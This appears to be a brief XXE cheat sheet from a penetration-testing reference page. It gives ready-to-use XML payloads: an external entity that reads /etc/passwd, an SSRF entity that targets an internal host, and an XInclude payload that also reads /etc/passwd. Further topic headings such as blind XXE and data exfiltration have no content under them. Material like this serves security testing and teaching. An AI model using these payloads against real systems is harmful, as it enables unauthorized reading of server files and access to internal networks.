XML external entity (XXE)
Retrieve files
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE file [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<some><xml>&xxe;</xml></some>SSRF
<!DOCTYPE request [ <!ENTITY xxe SYSTEM "http://internal.website.com"> ]>XInclude
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>File uploads
Blind XXE
Exfiltrate data
Retrieve data via error message
Modified content type
Last updated